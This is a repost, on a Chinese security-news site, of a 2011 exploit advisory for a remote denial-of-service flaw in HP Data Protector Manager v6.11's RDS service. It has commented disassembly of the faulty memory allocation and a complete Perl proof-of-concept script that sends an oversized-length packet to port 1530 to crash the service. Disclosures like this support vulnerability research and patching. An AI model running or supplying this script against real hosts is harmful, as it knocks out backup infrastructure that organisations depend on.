首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Data Protector Manager v6.11 Remote DoS in RDS Service
来源:http://www.pepelux.org 作者:Pepelux 发布时间:2011-01-10  

HP Data Protector Manager v6.11 Remote DoS in RDS Service

# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: Remote Denial of Service Vulnerabilities (RDS Service)
#
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 08/01/2011
# Authors: Roi Mallo - rmallof[AT]gmail[DOT]com
#                   http://elotrolad0.blogspot.com/ - http://twitter.com/rmallof
#              Pepelux - pepelux[AT]enye-sec[DOT]com
#                   http://www.enye-sec.org - http://www.pepelux.org - http://twitter.com/pepeluxx
#
# Vulnerable file: Program Files\OmniBack\rds.exe
#
# Tested on Windows XP SP2 && Windows XP SP3
#
#
# POC:
# _ncp32.dll is the responsable of waiting the packet (RECV)
# when a packet is received, it uses _rm32.dll to allocating memory,
# as the size is too big, malloc can't allocate this size and the program exit.
#
# _ncp32.dll
# 00482F92   68 7DFAF908   PUSH 8F9FA7D
# 00482F97   6A 00             PUSH 0
# 00482F99   6A 01             PUSH 1
# 00482F9B   6A 00             PUSH 0
# 00482F9D   8B55 F8           MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
# 00482FA0   52                 PUSH EDX
# 00482FA1   E8 9C2D0000 CALL <JMP.&_rm32.#20_rm_getMem>
#
#
# _rm32.dll
# 0038C49B   8B45 08           MOV EAX,DWORD PTR SS:[EBP+8] : packet size (64000000h)
# 0038C49E   83C0 08           ADD EAX,8
# 0038C4A1   50                PUSH EAX
# 0038C4A2   FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>]    ; MSVCR71.malloc  --> Returns 0 because no space available
# ......
# 0038C5F9   50                 PUSH EAX
# 0038C5FA   68 2C0C3A00   PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
#......
# 0038C64E   E8 8D220000      CALL _rm32.rm_errorExit

 

use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
 print "Usage: perl $0 <host> [port]\n";
 print "\tdefault port = 1530\n\n";
 exit 1;
}

$port = 1530 if !($ARGV[1]);


if ($^O =~ /Win/) {system("cls");}else{system("clear");}

my $buf = "\x23\x8c\x29\xb6";  # header (always the same)
$buf .= "\x64\x00\x00\x00";   # data packet size (too big)
$buf .= "\x41"x4;      # data

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n";
exit;

 

#!/usr/bin/perl
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetSupport Manager Agent Remot
·Winamp 5.5.8 (in_mod plugin) S
·VideoSpirit Pro <= v1.68 Local
·Linux Kernel CAP_SYS_ADMIN to
·BS.Player 2.57 Buffer Overflow
·IrfanView 4.28 Multiple Denial
·Enzip 3.00 Buffer Overflow
·KingView 6.5.3 SCADA HMI Heap
·proftpd multiple exploit for V
·Enzip 3.00 Buffer Overflow Exp
·Microsoft Windows CreateSizedD
·Macro Express Pro 4.2.2.1 MXE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved